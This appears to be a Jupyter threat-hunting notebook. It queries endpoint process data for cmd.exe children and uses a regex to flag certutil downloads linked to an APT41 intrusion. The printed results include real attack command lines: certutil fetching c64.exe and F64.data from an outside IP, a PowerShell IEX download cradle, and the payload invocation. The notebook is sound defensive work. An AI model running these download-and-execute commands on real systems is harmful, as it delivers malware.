# CERTUTIL hunt

This notebook helps to collect all cmd (cmd.exe) and (certutil.exe) process executions in order to find suspicious activity.

This example demonstrates how to find suspicious executions that are downloaded by using certutil.exe, and then using certutil.exe to attack.

In [1]:
from pyclient.stix_shifter_dataframe import StixShifterDataFrame
from dateutil import parser
import huntlib
import re
import pandas as pd

In [2]:
usr, psw = huntlib.util.promptCreds()

Username: demo
Password: ········


In [3]:
carbon_black_stix_bundle = 'https://raw.githubusercontent.com/opencybersecurityalliance/stix-shifter/develop/data/cybox/carbon_black/carbon_black_observable.json'
sb_config = {
    'connection': {
        "host": carbon_black_stix_bundle,
        "port": 443
    },
    'configuration': {
        "auth": {
            "username": usr,
            "password": psw
        }
    },
    'data_source': '{"type": "identity", "id": "identity--3532c56d-ea72-48be-a2ad-1a53f4c9c6d3", "name": "stix_boundle", "identity_class": "events"}'
}

In [4]:
def get_duration(duration):
    days, seconds = duration.days, duration.seconds
    hours = seconds // 3600
    minutes = (seconds % 3600) // 60
    seconds = seconds % 60
    return f"{days}d {hours}h {minutes}m {seconds}.{duration.microseconds//1000}s"

In [19]:
def defang(url):
    return re.sub('http', 'hxxp', url)

# Fetch process data that are spawn by cmd

In [23]:
ssdf = StixShifterDataFrame()
ssdf.add_config('stix_bundle', sb_config)

# stix-shifter uses STIX patterning as its query language
# See http://docs.oasis-open.org/cti/stix/v2.0/cs01/part5-stix-patterning/stix-v2.0-cs01-part5-stix-patterning.html
cmd_query = "[process:name = 'cmd.exe']"
df = ssdf.search_df(query=cmd_query, config_names=['stix_bundle'])

In [9]:
df['first_observed'] = pd.to_datetime(df['first_observed'], infer_datetime_format=True, utc=True)
df['last_observed'] = pd.to_datetime(df['last_observed'], infer_datetime_format=True, utc=True)
df['duration'] = df['last_observed'] - df['first_observed']
df['duration'] = df['duration'].map(lambda dur: get_duration(dur))

In [10]:
df.head()

,created,created_by_ref,first_observed,id,last_observed,modified,number_observed,type,process:command_line,process:created,...,domain-name:value,network-traffic:type,network-traffic:dst_ref.type,network-traffic:dst_ref.value,network-traffic:src_ref.type,network-traffic:src_ref.value,user-account:type,user-account:user_id,data_source,duration
0,2019-10-03T14:53:35Z,identity--3532c56d-ea72-48be-a2ad-1a53f4c9c6d3,2019-10-03 14:53:35+00:00,observed-data--b7767318-6cca-4cf8-9280-826ed5f...,2019-10-03 14:53:35+00:00,2019-10-03T14:53:35Z,1,observed-data,certutil -urlcache -split -f http://67.229.97....,2019-10-03T14:53:35Z,...,workstation,network-traffic,ipv4-addr,127.0.0.1,ipv4-addr,67.229.97.229,user-account,SYSTEM,stix_bundle,0d 0h 0m 0.0s
0,2019-10-03T14:53:35Z,identity--3532c56d-ea72-48be-a2ad-1a53f4c9c6d3,2019-10-03 14:53:35+00:00,observed-data--b7767318-6cca-4cf8-9280-826ed5f...,2019-10-03 14:53:35+00:00,2019-10-03T14:53:35Z,1,observed-data,certutil -urlcache -split -f http://67.229.97....,2019-10-03T14:53:35Z,...,workstation,network-traffic,ipv4-addr,127.0.0.1,ipv4-addr,67.229.97.229,user-account,SYSTEM,stix_bundle,0d 0h 0m 0.0s
0,2019-10-03T14:53:35Z,identity--3532c56d-ea72-48be-a2ad-1a53f4c9c6d3,2019-10-03 14:53:35+00:00,observed-data--b7767318-6cca-4cf8-9280-826ed5f...,2019-10-03 14:53:35+00:00,2019-10-03T14:53:35Z,1,observed-data,"c64.exe f64.data ""9839D7F1A0 -m""",2019-10-03T14:53:35Z,...,workstation,network-traffic,ipv4-addr,127.0.0.1,ipv4-addr,,user-account,SYSTEM,stix_bundle,0d 0h 0m 0.0s
0,2019-10-03T14:51:35Z,identity--3532c56d-ea72-48be-a2ad-1a53f4c9c6d3,2019-10-03 14:53:35+00:00,observed-data--b7767318-6cca-4cf8-9280-826ed5f...,2019-10-03 14:53:35+00:00,2019-10-03T14:53:35Z,1,observed-data,"powershell ""IEX (New-Object Net.WebClient).Dow...",2019-10-03T14:53:35Z,...,workstation,network-traffic,ipv4-addr,127.0.0.1,ipv4-addr,,user-account,SYSTEM,stix_bundle,0d 0h 0m 0.0s
0,2019-10-01T19:29:35Z,identity--3532c56d-ea72-48be-a2ad-1a53f4c9c6d3,2019-10-01 19:29:35+00:00,observed-data--b7767318-6cca-4cf8-9280-826ed5f...,2019-10-01 19:29:35+00:00,2019-10-01T19:29:35Z,1,observed-data,,2019-10-01T19:29:35Z,...,workstation,network-traffic,ipv4-addr,192.168.0.8,ipv4-addr,67.229.97.229,user-account,SYSTEM,stix_bundle,0d 0h 0m 0.0s


# Find suspicious command line

In [21]:
# Use a regex to find suspicious certutil usage
susp = df[df['process:command_line'].str.contains(r'certutil.*[0-9a-zA-Z_-]*\.(exe|dat)')]

# Look at the matches (defang any URLs in there since jupyter makes them clickable!)
list(map(defang, susp['process:command_line'].head().to_list()))

['certutil -urlcache -split -f hxxp://67.229.97.229/c64.exe c64.exe',
 'certutil -urlcache -split -f hxxp://67.229.97.229/F64.data F64.data']

# Attack steps

In [22]:
fields = ['first_observed', 'last_observed', 'duration',
    'process:name', 'process:pid', 
    'process:binary_ref.name', 'process:parent_ref.name', 
    'network-traffic:dst_ref.value', 'network-traffic:src_ref.value', 
    'process:command_line', 'user-account:user_id'
]

df[fields].sort_values(by=['first_observed'])

,first_observed,last_observed,duration,process:name,process:pid,process:binary_ref.name,process:parent_ref.name,network-traffic:dst_ref.value,network-traffic:src_ref.value,process:command_line,user-account:user_id
0,2019-10-01 19:29:35+00:00,2019-10-01 19:29:35+00:00,0d 0h 0m 0.0s,,757,,cmd.exe,192.168.0.8,67.229.97.229,,SYSTEM
0,2019-10-03 14:53:35+00:00,2019-10-03 14:53:35+00:00,0d 0h 0m 0.0s,certutil.exe,744,certutil.exe,cmd.exe,127.0.0.1,67.229.97.229,certutil -urlcache -split -f http://67.229.97....,SYSTEM
0,2019-10-03 14:53:35+00:00,2019-10-03 14:53:35+00:00,0d 0h 0m 0.0s,certutil.exe,744,certutil.exe,cmd.exe,127.0.0.1,67.229.97.229,certutil -urlcache -split -f http://67.229.97....,SYSTEM
0,2019-10-03 14:53:35+00:00,2019-10-03 14:53:35+00:00,0d 0h 0m 0.0s,c64.exe,757,c64.exe,cmd.exe,127.0.0.1,,"c64.exe f64.data ""9839D7F1A0 -m""",SYSTEM
0,2019-10-03 14:53:35+00:00,2019-10-03 14:53:35+00:00,0d 0h 0m 0.0s,powershell.exe,2252,powershell.exe,cmd.exe,127.0.0.1,,"powershell ""IEX (New-Object Net.WebClient).Dow...",SYSTEM


In this notebook, we finally found that this is a APT attack , ```c64.exe f64.data "9839D7F1A0 -m" ```
Ref: https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html